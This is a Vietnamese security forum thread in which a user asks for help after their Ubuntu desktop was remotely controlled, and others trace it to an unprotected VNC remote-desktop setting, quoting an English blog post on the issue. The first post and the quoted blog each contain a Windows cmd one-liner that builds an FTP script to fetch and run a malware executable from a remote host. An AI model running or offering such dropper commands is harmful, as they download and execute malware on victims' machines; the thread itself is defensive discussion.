banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Cần giúp đỡ chống bị remote trên Ubuntu  XML
  [Question]   Cần giúp đỡ chống bị remote trên Ubuntu 23/05/2012 19:24:41 (+0700) | #1 | 263902
vtigerntis
Member

[Minus]    0    [Plus]
Joined: 22/07/2008 18:23:56
Messages: 4
Offline
[Profile] [PM]
Chào mọi người!
Máy tính mình cài đặt hệ điều hành Ubuntu, một hôm đang dùng bỗng xảy ra sự cố khó hiểu là ... tự nhiên khởi động màn hình command line có dòng code sau:

Code:
r cmd /c echo open 27..195.14 3555 >> i echo user duoghy duy>> i &echo get wmsoft86885.exe >> i &echo quit >> i ftp -nv -s:i &wmsoft86885.exe &exit


Sau đó xuất hiện trên màn hình thông báo máy mình đang bị remote bởi một máy khác... Mình cũng đã google cả buổi với mấy cái từ khóa có trong dòng code trên nhưng không có kết quả. Có ai giúp mình với ... hix hix smilie
[Up] [Print Copy]
  [Question]   Cần giúp đỡ chống bị remote trên Ubuntu 23/05/2012 20:27:04 (+0700) | #2 | 263906
acenux
Member

[Minus]    0    [Plus]
Joined: 26/02/2012 19:52:32
Messages: 12
Offline
[Profile] [PM]
Ngày trước có người đã gặp vấn đề này trên bản Ubuntu 10.04 LTS, nguyên nhân là do người dùng bật tính năng remote desktop với tuỳ chọn "Configure network automatically to accept connections" nhưng lại không đặt mật khẩu hoặc mật khẩu quá yếu. Như vậy bất cứ máy tính nào cũng có thể kết nối tơima1y nạn nhân

Cách khắc phụ là tắt tính năng remote desktop, tắt tuỳ chọn "Configure network automatically to accept connections" hoặc đổi mật khẩu mạnh hơn. Chi tiết cách làm thì phải tuỳ thuộc vào phiên bản Ubuntu mà vtigerntis đang sử dụng, vì từ Ubuntu 11.04 đã thay đổi giao diện khác với trước.

Tham khảo về vấn đề này tại đây:
Code:
http://www.highseverity.com/2011/11/accidentally-opening-doors-on-ubuntu.html
[Up] [Print Copy]
  [Question]   Cần giúp đỡ chống bị remote trên Ubuntu 23/05/2012 20:33:52 (+0700) | #3 | 263907
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Cài distro nào bị chế có gắn hàng rồi.
"wmsoft86885.exe" là cái gì vậy.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Cần giúp đỡ chống bị remote trên Ubuntu 23/05/2012 23:24:57 (+0700) | #4 | 263911
vtigerntis
Member

[Minus]    0    [Plus]
Joined: 22/07/2008 18:23:56
Messages: 4
Offline
[Profile] [PM]
Cám ơn mọi người rất nhiều!

Chính xác là mình có check vào box [Configure network automatically to accept connections], nhưng nghĩ chức năng này chỉ remote trong mạng Lan (nếu không NAT port nào ra ngoài) nên không thể bị remote từ internet dễ dàng như vậy.
Sau khi đọc bài bên dưới ... thì đúng là đáng cái tội "Chết vì thiếu hiểu biết" smilie smilie

http://www.highseverity.com/2011/11/accidentally-opening-doors-on-ubuntu.html
So, after checking the box, the user's UPnP-enabled router will start to accept connections from the internet on port 5900 and forward them to the Ubuntu desktop. Even so, the settings dialog reassuringly and erroneously states that "Your desktop is only reachable over the local network." The combination of this bug and the slightly unclear option label has caused the user to accidentally open the doors on their Ubuntu desktop. To anyone.

Anybody in the world can now use this person's computer simply by using a VNC client to connect to the public-facing IP address of the router (no password required, of course).

Internet-facing VNC servers are often subjected to automated attacks from botnets, but vino-server's lack of connection logging might make these hard to trace after the event. Thankfully, most of the automated attacks happening right now are only designed to exploit Windows systems. You may, for example, notice attacks similar to the following, which launch a command prompt and create a temporary FTP script named "ik", which is then used to download and execute malware:
cmd /c echo open example.com 21 >> ik &echo user xyz letmein >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned

The botnet simply connects to an exposed VNC server and sends these characters to the remote Windows computer. Quite cheeky, but at least it has the decency to tell the user they got owned!

Are you affected by this? If you have enabled remote desktop or vino-server on any version of Ubuntu or Windows, you should probably double check that you haven't inadvertently exposed the service to the entire internet. If you do wish for the service to be internet visible, ensure that you use a suitably strong password and keep your server software up to date. 


[Up] [Print Copy]
  [Question]   Cần giúp đỡ chống bị remote trên Ubuntu 24/05/2012 04:50:07 (+0700) | #5 | 263914
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]
Bạn giải thích sao lại có cmd /c được không đoạn này ảo quá smilie.
while(1){}
[Up] [Print Copy]
  [Question]   Cần giúp đỡ chống bị remote trên Ubuntu 24/05/2012 05:22:46 (+0700) | #6 | 263919
acenux
Member

[Minus]    0    [Plus]
Joined: 26/02/2012 19:52:32
Messages: 12
Offline
[Profile] [PM]

chiro8x wrote:
Bạn giải thích sao lại có cmd /c được không đoạn này ảo quá smilie


Nếu ý của chiro8x là sao lại có câu lệnh Windows cmd /c thì theo như trên Ubuntuforum thảo luận thì có người nói đây là 1 con auto bot của Windows có nhiệm vụ tìm các VNC server không mật khẩu hoặc mật khẩu yếu (sau đó brute-force). Vậy nên khi đã lọt vào sever thì nó làm đúng như kịch bản đã dựng nên toàn là câu lệnh bên WIndows như mọi người đã thấy.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|